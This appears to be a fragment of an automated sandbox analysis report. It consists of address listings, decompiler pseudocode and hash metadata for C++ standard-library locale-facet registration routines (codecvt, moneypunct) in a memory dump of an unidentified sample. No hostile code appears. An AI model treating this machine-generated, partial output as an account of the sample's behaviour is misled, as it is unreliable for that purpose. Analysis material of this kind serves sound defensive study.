                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456
                                                                                                0x00f873da
                                                                                                0x00f873da
                                                                                                0x00f873dd
                                                                                                0x00f873e1
                                                                                                0x00f873e5
                                                                                                0x00f873f2
                                                                                                0x00f873fa
                                                                                                0x00f873fc
                                                                                                0x00000000
                                                                                                0x00f873fc
                                                                                                0x00f873c3
                                                                                                0x00f873c3
                                                                                                0x00000000
                                                                                                0x00f873c3
                                                                                                0x00f873c1
                                                                                                0x00f87345
                                                                                                0x00f87345
                                                                                                0x00f87348
                                                                                                0x00f8734c
                                                                                                0x00f87350
                                                                                                0x00f8735d
                                                                                                0x00f87365
                                                                                                0x00f87367
                                                                                                0x00000000
                                                                                                0x00f87367
                                                                                                0x00f8732e
                                                                                                0x00f8732e
                                                                                                0x00000000
                                                                                                0x00f8732e
                                                                                                0x00f8732c
                                                                                                0x00f872b0
                                                                                                0x00f872b0
                                                                                                0x00f872b3
                                                                                                0x00f872b7
                                                                                                0x00f872bb
                                                                                                0x00f872c8
                                                                                                0x00f872d0
                                                                                                0x00f872d2
                                                                                                0x00000000
                                                                                                0x00f872d2
                                                                                                0x00f87299
                                                                                                0x00f87299
                                                                                                0x00000000
                                                                                                0x00f87299
                                                                                                0x00f87297
                                                                                                0x00f8721b
                                                                                                0x00f8721b
                                                                                                0x00f8721e
                                                                                                0x00f87222
                                                                                                0x00f87226
                                                                                                0x00f87233
                                                                                                0x00f8723b
                                                                                                0x00f8723d
                                                                                                0x00000000
                                                                                                0x00f8723d
                                                                                                0x00f87204
                                                                                                0x00f87204
                                                                                                0x00000000
                                                                                                0x00f87204
                                                                                                0x00f87202
                                                                                                0x00f87186
                                                                                                0x00f87186
                                                                                                0x00f87189
                                                                                                0x00f8718d
                                                                                                0x00f87191
                                                                                                0x00f8719e
                                                                                                0x00f871a6
                                                                                                0x00f871a8
                                                                                                0x00000000
                                                                                                0x00f871a8
                                                                                                0x00f8716f
                                                                                                0x00f8716f
                                                                                                0x00000000
                                                                                                0x00f8716f
                                                                                                0x00f8716d
                                                                                                0x00f870f1
                                                                                                0x00f870f1
                                                                                                0x00f870f4
                                                                                                0x00f870f8
                                                                                                0x00f870fc
                                                                                                0x00f87109
                                                                                                0x00f87111
                                                                                                0x00f87113
                                                                                                0x00000000
                                                                                                0x00f87113
                                                                                                0x00f870da
                                                                                                0x00f870da
                                                                                                0x00000000
                                                                                                0x00f870da
                                                                                                0x00f870d8
                                                                                                0x00f8705c
                                                                                                0x00f8705c
                                                                                                0x00f8705f
                                                                                                0x00f87063
                                                                                                0x00f87067
                                                                                                0x00f87074
                                                                                                0x00f8707c
                                                                                                0x00f8707e
                                                                                                0x00000000
                                                                                                0x00f8707e
                                                                                                0x00f87045
                                                                                                0x00f87045
                                                                                                0x00000000
                                                                                                0x00f87045
                                                                                                0x00f87043
                                                                                                0x00f86fc7
                                                                                                0x00f86fc7
                                                                                                0x00f86fca
                                                                                                0x00f86fce
                                                                                                0x00f86fd2
                                                                                                0x00f86fdf
                                                                                                0x00f86fe7
                                                                                                0x00f86fe9
                                                                                                0x00000000
                                                                                                0x00f86fe9
                                                                                                0x00f86fb0
                                                                                                0x00f86fb0
                                                                                                0x00000000
                                                                                                0x00f86fb0
                                                                                                0x00f86fae
                                                                                                0x00f86f32
                                                                                                0x00f86f32
                                                                                                0x00f86f35
                                                                                                0x00f86f39
                                                                                                0x00f86f3d
                                                                                                0x00f86f4a
                                                                                                0x00f86f52
                                                                                                0x00f86f54
                                                                                                0x00000000
                                                                                                0x00f86f54
                                                                                                0x00f86f1b
                                                                                                0x00f86f1b
                                                                                                0x00000000
                                                                                                0x00f86f1b
                                                                                                0x00f86f19

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F86EE2
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F86EEC
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • codecvt.LIBCPMT ref: 00F86F26
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F86F3D
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F86F5D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                • String ID:
                                                                                                • API String ID: 712880209-0
                                                                                                • Opcode ID: a1ba44c9d894ef469dc33c9a4e6289711439bee2a7b8cb30362e65f4e67d0432
                                                                                                • Instruction ID: 9b812744d44ae56f3f6258136e92c169bcebb6c8b94d060a387adc619589ff05
                                                                                                • Opcode Fuzzy Hash: a1ba44c9d894ef469dc33c9a4e6289711439bee2a7b8cb30362e65f4e67d0432
                                                                                                • Instruction Fuzzy Hash: 6601C4369001199BCB05FB64DC556EE77B5AF84760F54800AF505A7392DF78DE02BB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F8766C(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				signed int _t93;
                                                                                                				void* _t164;
                                                                                                				short* _t238;
                                                                                                				void* _t260;
                                                                                                				signed int _t263;
                                                                                                				signed int _t264;
                                                                                                				signed int _t265;
                                                                                                				signed int _t266;
                                                                                                				signed int _t267;
                                                                                                				signed int _t268;
                                                                                                				signed int _t270;
                                                                                                				signed int _t271;
                                                                                                				signed int _t272;
                                                                                                				signed int _t273;
                                                                                                				signed int _t274;
                                                                                                				signed int _t275;
                                                                                                				signed int _t276;
                                                                                                				short* _t277;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t270 =  *0xfd0ae0; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t270;
                                                                                                				_t93 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t262 = _t93;
                                                                                                				if(_t93 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t262);
                                                                                                				} else {
                                                                                                					if(_t270 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F889E9(_t262, _t270, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t262, _t270);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t271 =  *0xfd0af4; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t271;
                                                                                                							_t263 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t263;
                                                                                                							if(_t263 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t263);
                                                                                                							} else {
                                                                                                								__eflags = _t271;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F88A6E(_t263, _t271, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t263, _t271);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t272 =  *0xfd0af8; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t272;
                                                                                                										_t264 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t264;
                                                                                                										if(_t264 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t264);
                                                                                                										} else {
                                                                                                											__eflags = _t272;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F88AD6(_t264, _t272, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t264, _t272);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t273 =  *0xfd0afc; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t273;
                                                                                                													_t265 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t265;
                                                                                                													if(_t265 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t265);
                                                                                                													} else {
                                                                                                														__eflags = _t273;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F88B3E(_t260, _t265, _t273, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t265, _t273);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t274 =  *0xfd0b18; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t274;
                                                                                                																_t266 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t266;
                                                                                                																if(_t266 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t266);
                                                                                                																} else {
                                                                                                																	__eflags = _t274;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F88BB9(_t266, _t274, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t266, _t274);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t275 =  *0xfd0ae8; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t275;
                                                                                                																			_t267 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t267;
                                                                                                																			if(_t267 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t267);
                                                                                                																			} else {
                                                                                                																				__eflags = _t275;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F88C25(_t267, _t275, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t267, _t275);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t276 =  *0xfd0b1c; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t276;
                                                                                                																						_t268 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t268;
                                                                                                																						if(_t268 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t268);
                                                                                                																						} else {
                                                                                                																							__eflags = _t276;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								_t164 = E00F88C91(_t268, _t276, __eflags);
                                                                                                																								_pop(_t238);
                                                                                                																								__eflags = _t164 - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(_t276);
                                                                                                																									_t277 = _t238;
                                                                                                																									_t86 = _t277 + 0x10;
                                                                                                																									 *_t86 =  *(_t277 + 0x10) & 0x00000000;
                                                                                                																									__eflags =  *_t86;
                                                                                                																									 *((intOrPtr*)(_t277 + 0x14)) = 7;
                                                                                                																									 *_t277 = 0;
                                                                                                																									E00F8D9F3(_v24);
                                                                                                																									return _t277;
                                                                                                																								} else {
                                                                                                																									_t268 = _v16;
                                                                                                																									_v16 = _t268;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t268);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
                                                                                                																									 *0xfd0b1c = _t268;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t268 = _t276;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t267 = _v16;
                                                                                                																						_v16 = _t267;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t267);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
                                                                                                																						 *0xfd0ae8 = _t267;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t267 = _t275;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t266 = _v16;
                                                                                                																			_v16 = _t266;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t266);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
                                                                                                																			 *0xfd0b18 = _t266;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t266 = _t274;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t265 = _v16;
                                                                                                																_v16 = _t265;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t265);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t265 + 4))))();
                                                                                                																 *0xfd0afc = _t265;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t265 = _t273;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t264 = _v16;
                                                                                                													_v16 = _t264;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t264);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t264 + 4))))();
                                                                                                													 *0xfd0af8 = _t264;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t264 = _t272;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t263 = _v16;
                                                                                                										_v16 = _t263;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t263);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t263 + 4))))();
                                                                                                										 *0xfd0af4 = _t263;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t263 = _t271;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t262 = _v16;
                                                                                                							_v16 = _t262;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t262);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t262 + 4))))();
                                                                                                							 *0xfd0ae0 = _t262;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t262 = _t270;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}

























                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f8769d
                                                                                                0x00f876a2
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F87673
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F8767D
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • moneypunct.LIBCPMT ref: 00F876B7
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F876CE
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F876EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                • String ID:
                                                                                                • API String ID: 419941038-0
                                                                                                • Opcode ID: c1aa47a3f8d50efd42f0d2b198c0c754176fbfcce6135177d83288cfa5450f47
                                                                                                • Instruction ID: 6e2ef1390a4e1b5a39afe9e2050d244f6af7e0f1084cc2d985238d4c599e6c3a
                                                                                                • Opcode Fuzzy Hash: c1aa47a3f8d50efd42f0d2b198c0c754176fbfcce6135177d83288cfa5450f47
                                                                                                • Instruction Fuzzy Hash: A201C4369006299BCB04FB68CC45BFE7771AF84760F64410AE405AB391DF78DE02BB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
